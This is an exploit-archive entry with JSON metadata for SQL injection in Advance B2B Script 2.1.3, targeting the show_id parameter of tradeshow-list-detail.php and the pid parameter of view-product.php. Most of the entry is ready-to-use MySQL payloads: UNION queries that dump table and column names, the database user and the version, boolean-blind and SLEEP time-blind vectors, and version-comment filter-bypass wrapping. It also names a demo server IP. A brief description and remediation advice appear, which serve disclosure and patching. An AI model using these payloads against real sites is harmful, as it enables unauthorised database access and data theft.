ID 1337DAY-ID-29154
Type zdt
Reporter Ihsan Sencan
Modified 2017-12-10T00:00:00
Description
Exploit for php platform in category web applications
# # # # #
# Exploit Title: Advance B2B Script 2.1.3 - SQL Injection
# Dork: N/A
# Date: 08.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/advance-b2b-script/
# Demo: http://198.38.86.159/~advancedb2b/
# Version: 2.1.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The show_id parameter of tradeshow-list-detail.php and the pid parameter of view-product.php
# are used in SQL queries without sanitisation or parameterisation, so a crafted GET request
# injects arbitrary SQL (the PoC shows no authentication step). The payloads below are
# MySQL-specific: UNION-based extraction of information_schema (table/column names), USER(),
# DATABASE() and VERSION(), plus the boolean-blind and SLEEP()-based time-blind vectors found
# by sqlmap. The /*!11111 ... */ version-comment wrapping is a WAF/filter bypass, not required
# for the injection itself. Remediation: bind these ids with prepared statements (PDO/mysqli)
# and cast numeric identifiers to integers before use.
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/tradeshow-list-detail.php?show_id=[SQL]
#
# NOTE(review): the published copy rendered the token "where@" as "[email protected]" (an
# email-obfuscation artifact of the hosting site); the payload is restored below.
# -33'++UNION+ALL+SELECT+1,(/*!11111Select*/+export_set(5,@:=0,(/*!11111select*/+count(*)/*!11111from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!11111table_name*/,0x3c6c693e,2),/*!11111column_name*/,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67--+-
#
# http://server/tradeshow-list-detail.php?show_id=-33'++UNION+ALL+SELECT+1,(/*!11111Select*/+export_set(5,@:=0,(/*!11111select*/+count(*)/*!11111from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!11111table_name*/,0x3c6c693e,2),/*!11111column_name*/,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67--+-
#
# Parameter: show_id (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: show_id=33' AND 2728=2728 AND 'YmuO'='YmuO
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 67 columns
# Payload: show_id=-3015' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171706b71,0x584943414f617573724e456a6a5369584f53494448646a56596b4a54736670476c424d6b6a4e556b,0x7170707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- pUZl
#
# 2)
# http://localhost/[PATH]/view-product.php?pid=[SQL]
#
# -1555'++UNION+ALL+SELECT+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+-
#
# http://server/view-product.php?pid=-1555'++UNION+ALL+SELECT+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+-
#
# Parameter: pid (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: pid=1555' AND 2914=2914 AND 'zyef'='zyef
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: pid=1555' AND SLEEP(5) AND 'DubS'='DubS
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 33 columns
# Payload: pid=1555' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176706b71,0x4776706c6c514f494a596a436179624947684a6c655163434156506b6d454463737076706d52506d,0x71766b7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- hHVm
#
# # # # #
{"sourceData": "# # # # # \r\n# Exploit Title: Advance B2B Script 2.1.3 - SQL Injection\r\n# Dork: N/A\r\n# Date: 08.12.2017\r\n# Vendor Homepage: https://www.phpscriptsmall.com/\r\n# Software Link: https://www.phpscriptsmall.com/product/advance-b2b-script/\r\n# Demo: http://198.38.86.159/~advancedb2b/\r\n# Version: 2.1.3\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: N/A\r\n# # # # #\r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Social: @ihsansencan\r\n# # # # #\r\n# Description:\r\n# The vulnerability allows an attacker to inject sql commands....\r\n# \r\n# Proof of Concept: \r\n# \r\n# 1)\r\n# http://localhost/[PATH]/tradeshow-list-detail.php?show_id=[SQL]\r\n# \r\n# -33'++UNION+ALL+SELECT+1,(/*!11111Select*/+export_set(5,@:=0,(/*!11111select*/+count(*)/*!11111from*/(information_schema.columns)[email\u00a0protected]:=export_set(5,export_set(5,@,/*!11111table_name*/,0x3c6c693e,2),/*!11111column_name*/,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67--+-\r\n# \r\n# http:/server/tradeshow-list-detail.php?show_id=-33'++UNION+ALL+SELECT+1,(/*!11111Select*/+export_set(5,@:=0,(/*!11111select*/+count(*)/*!11111from*/(information_schema.columns)[email\u00a0protected]:=export_set(5,export_set(5,@,/*!11111table_name*/,0x3c6c693e,2),/*!11111column_name*/,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67--+-\r\n# \r\n# Parameter: show_id (GET)\r\n# Type: boolean-based blind\r\n# Title: AND boolean-based blind - WHERE or HAVING clause\r\n# Payload: show_id=33' AND 2728=2728 AND 'YmuO'='YmuO\r\n# \r\n# Type: UNION query\r\n# Title: Generic UNION query (NULL) - 67 columns\r\n# Payload: show_id=-3015' UNION ALL SELECT 
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171706b71,0x584943414f617573724e456a6a5369584f53494448646a56596b4a54736670476c424d6b6a4e556b,0x7170707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- pUZl\r\n# \r\n# 2)\r\n# http://localhost/[PATH]/view-product.php?pid=[SQL]\r\n# \r\n# -1555'++UNION+ALL+SELECT+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+-\r\n# \r\n# http://server/view-product.php?pid=-1555'++UNION+ALL+SELECT+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+-\r\n# \r\n# Parameter: pid (GET)\r\n# Type: boolean-based blind\r\n# Title: AND boolean-based blind - WHERE or HAVING clause\r\n# Payload: pid=1555' AND 2914=2914 AND 'zyef'='zyef\r\n# \r\n# Type: AND/OR time-based blind\r\n# Title: MySQL >= 5.0.12 AND time-based blind\r\n# Payload: pid=1555' AND SLEEP(5) AND 'DubS'='DubS\r\n# \r\n# Type: UNION query\r\n# Title: Generic UNION query (NULL) - 33 columns\r\n# Payload: pid=1555' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176706b71,0x4776706c6c514f494a596a436179624947684a6c655163434156506b6d454463737076706d52506d,0x71766b7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- hHVm\r\n# \r\n# # # # #\n\n# 0day.today [2018-01-05] #", "description": "Exploit for php platform in category web applications", "sourceHref": "https://0day.today/exploit/29154", "reporter": "Ihsan Sencan", "href": "https://0day.today/exploit/description/29154", "type": "zdt", "viewCount": 7, "references": [], "lastseen": "2018-01-05T19:13:53", "published": 
"2017-12-10T00:00:00", "cvelist": [], "id": "1337DAY-ID-29154", "modified": "2017-12-10T00:00:00", "title": "Advance B2B Script 2.1.3 - show_id / pid SQL Injection Vulnerability", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2018-01-05T19:13:53", "rev": 2}, "dependencies": {"references": [], "modified": "2018-01-05T19:13:53", "rev": 2}, "vulnersScore": 0.6}, "immutableFields": []}
{}